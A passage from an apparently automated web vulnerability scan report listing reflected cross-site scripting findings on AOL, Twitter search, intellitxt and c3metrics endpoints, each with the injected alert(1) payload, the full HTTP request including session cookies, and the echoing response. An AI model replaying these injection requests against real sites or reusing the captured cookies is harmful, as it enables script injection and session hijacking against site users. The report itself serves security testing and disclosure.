Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Thu, 12 May 2011 01:00:40 GMT
Date: Thu, 05 May 2011 01:00:40 GMT
Connection: close

BF_PARTNER.gate_response21ff9<script>alert(1)</script>28fc23c1688(1304530525);

5.154. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.pf.aol.com
Path:   /jsonmfus/ws

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 228b8<script>alert(1)</script>03e62d5cb67 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonmfus/ws?service=symslist,markets&symbols=E:DJI:$INDU,E:NAI:$COMPX,E:CMI:$INX,E:BSS:(TC10Y,E:ISE:UKX,E:FX1:N225,E:FX1:HSIX,E:FX1:EURUSD,E:FX1:USDJPY,E:DEI:DAX,E:FX1:GBPUSD,E:FX1:USDCHF,E:CMX:/GC\M11,E:NYM:/CL\M11,E:NYM:/NG\N11,E:NYM:/PL\N11,E:NYS:C,E:NYS:SLV,NYS:SPY,E:NYS:BAC,E:NYS:RENN,E:NYS:BKS,NYS:TMH,E:NYS:HPY,E:NYS:CPF.RT,E:NYS:KV.B,NYS:DVR,E:NYS:KV.A&porttype=2&portmax=100&callback=rebuildLiveHash228b8<script>alert(1)</script>03e62d5cb67&rf=http://www.dailyfinance.com HTTP/1.1
Host: portal.pf.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:20 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate, no-transform
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=utf-8
Content-Length: 16480

rebuildLiveHash228b8<script>alert(1)</script>03e62d5cb67({"ResultSet": {
"symslist": [
{
"lu": "http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji",
"c": "-83.93",
"xdn": "DJ Index",
"p": "12,723.58",
"pc": "-0.66"
...[SNIP]...

5.155. http://portal.pf.aol.com/jsonqpus/ws [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.pf.aol.com
Path:   /jsonqpus/ws

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 186a5<script>alert(1)</script>ee3f8d1bcc6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonqpus/ws?service=futures,&exchange=&symbols=&futurestype=2&futureskeyword=NYMEX_GOLD_FUTURES,NYMEX_CRUDE_FUTURES,NYMEX_NATURAL_GAS_FUTURES,NYMEX_PLATINUM_FUTURES,&futuresmax=1&callback=jQuery1509592739215586334_1304575094374186a5<script>alert(1)</script>ee3f8d1bcc6 HTTP/1.1
Host: portal.pf.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575091494-Repeat%7C1367647091494%3B%20s_nrgvo%3DRepeat%7C1367647091495%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:18 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate, no-transform
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 1456
Content-Type: text/javascript;charset=utf-8

jQuery1509592739215586334_1304575094374186a5<script>alert(1)</script>ee3f8d1bcc6({"ResultSet": {"futures": [
{
"lu": "http://www.dailyfinance.com/quotes/gold-futures-jun-2011-composite/%252fgc%5cm11/cmx",
"xcntrc": "USA",
"t": "STOCK",
"xdn": "COMEX",
"xcntr": "USA",

...[SNIP]...

5.156. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://portalblog.aol.com
Path:   /2011/02/01/aol-across-the-web-and-beyond/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9f0"-alert(1)-"394da22382f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/01/aol-across-the-web-and-beyond/?ba9f0"-alert(1)-"394da22382f=1 HTTP/1.1
Host: portalblog.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:53:58 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:53:57 GMT; path=/
Keep-Alive: timeout=5, max=999936
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 62994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
inkInternalFilters="javascript:,portalblog.aol.com";
s_265.mmxgo = true;
s_265.prop1="Portalblog";
s_265.prop2="Post";
s_265.prop12="http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?ba9f0"-alert(1)-"394da22382f=1";
s_265.prop16="AOL Across the Web &amp; Beyond - AOL.com Blog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="";
s_265.prop22="275";
s_265.prop9="bsd:19820106";

...[SNIP]...

5.157. http://realestate.aol.com/blog/rental-listings [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://realestate.aol.com
Path:   /blog/rental-listings

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c8d9"><a>bf6814ac77d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/rental-listings2c8d9"><a>bf6814ac77d HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=D3ADC406715086AF88306DB70AF4855B; userNum=61; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:54:08 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243_205_188_91_40=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:54:08 GMT; path=/
Keep-Alive: timeout=5, max=999982
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 53741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--PLUGIN NOTICE: Cache Key: 675-get_plugin(8423d27ca021655eabba0420743610a5)
...[SNIP]...
<link rel="canonical" href="http://realestate.aol.com/blog/rental-listings2c8d9"><a>bf6814ac77d" />
...[SNIP]...

5.158. http://search.twitter.com/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 5f288<script>alert(1)</script>cc11d4ec8c3 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=cool+filter%3Alinks5f288<script>alert(1)</script>cc11d4ec8c3&refresh=true&since_id=66122524215349250 HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://search.twitter.com/search?q=cool+filter%3Alinks
X-Prototype-Version: 1.6.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utmz=110314503.1304617781.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; _search_twitter_sess=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%0ASGFzaHsABjoKQHVzZWR7AA%3D%3D--105f4e06b6532a8b5e836f918bea0ef4c38e03fe; __utmv=; __utma=110314503.157873429.1304617781.1304617781.1304617781.1; __utmc=110314503; __utmb=110314503.9.10.1304617781

Response

HTTP/1.1 403 Forbidden
Date: Thu, 05 May 2011 12:50:53 GMT
Server: hi
Status: 403 Forbidden
X-Served-From: smf1-aek-19-sr4
Content-Type: application/json; charset=utf-8
X-Served-By: smf1-ada-11-sr4.prod.twitter.com
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Thu, 05 May 2011 12:55:53 GMT
X-Varnish: 1936803395
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-ada-11-sr4.prod.twitter.com
X-Cache: MISS
Vary: Accept-Encoding
Connection: close
Content-Length: 78

{"error":"Unknown filter type links5f288<script>alert(1)</script>cc11d4ec8c3"}

5.159. http://sportingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sportingnews.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb89a'-alert(1)-'cabf748942d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=19980&bb89a'-alert(1)-'cabf748942d=1 HTTP/1.1
Host: sportingnews.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7MAEAAAEvnbJjpwA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvakeuAA-; Domain=.intellitxt.com; Expires=Mon, 04-Jul-2011 00:57:47 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvakeuAA-; Domain=.intellitxt.com; Expires=Mon, 04-Jul-2011 00:57:47 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:57:47 GMT
Age: 0
Connection: keep-alive
Content-Length: 11737

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://sportingnews.us.intellitxt.com';$iTXT.js.pageQuery='ipid=19980&bb89a'-alert(1)-'cabf748942d=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

5.160. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload bc161<script>alert(1)</script>3a2ecd92a0e was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480bc161<script>alert(1)</script>3a2ecd92a0e&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480bc161<script>alert(1)</script>3a2ecd92a0e-SM=aol_05-05-2011-00-57-11; expires=Sun, 08-May-2011 00:57:11 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480bc161<script>alert(1)</script>3a2ecd92a0e-VT=aol_05-05-2011-00-57-11_17328168321304557031; expires=Tue, 03-May-2016 00:57:11 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480bc161<script>alert(1)</script>3a2ecd92a0e-nUID=aol_17328168321304557031; expires=Thu, 05-May-2011 01:12:11 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
lVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='aol';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480bc161<script>alert(1)</script>3a2ecd92a0e';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='17328168321304557031';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...

5.161. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 44f1f<script>alert(1)</script>ade769199ec was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol44f1f<script>alert(1)</script>ade769199ec&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:09 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:09 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol44f1f%3Cscript%3Ealert%281%29%3C%2Fscript%3Eade769199ec_05-05-2011-00-57-09_16502424161304557029; expires=Tue, 03-May-2016 00:57:09 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol44f1f%3Cscript%3Ealert%281%29%3C%2Fscript%3Eade769199ec_16502424161304557029; expires=Thu, 05-May-2011 01:12:09 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
lVar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='aol44f1f<script>alert(1)</script>ade769199ec';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='165024241613045
...[SNIP]...

5.162. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1ec5<script>alert(1)</script>4b011804435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=&uid=/c1ec5<script>alert(1)</script>4b011804435&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:17 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-17_18354599811304557037; expires=Tue, 03-May-2016 00:57:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_18354599811304557037; expires=Thu, 05-May-2011 01:12:17 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='18354599811304557037';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/c1ec5<script>alert(1)</script>4b011804435';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.163. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 486cc<script>alert(1)</script>6c5dd41fd57 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=486cc<script>alert(1)</script>6c5dd41fd57&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:13 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-13_3510636931304557033; expires=Tue, 03-May-2016 00:57:13 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_3510636931304557033; expires=Thu, 05-May-2011 01:12:13 GMT; path=/; domain=c3metrics.com
Content-Length: 6696
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
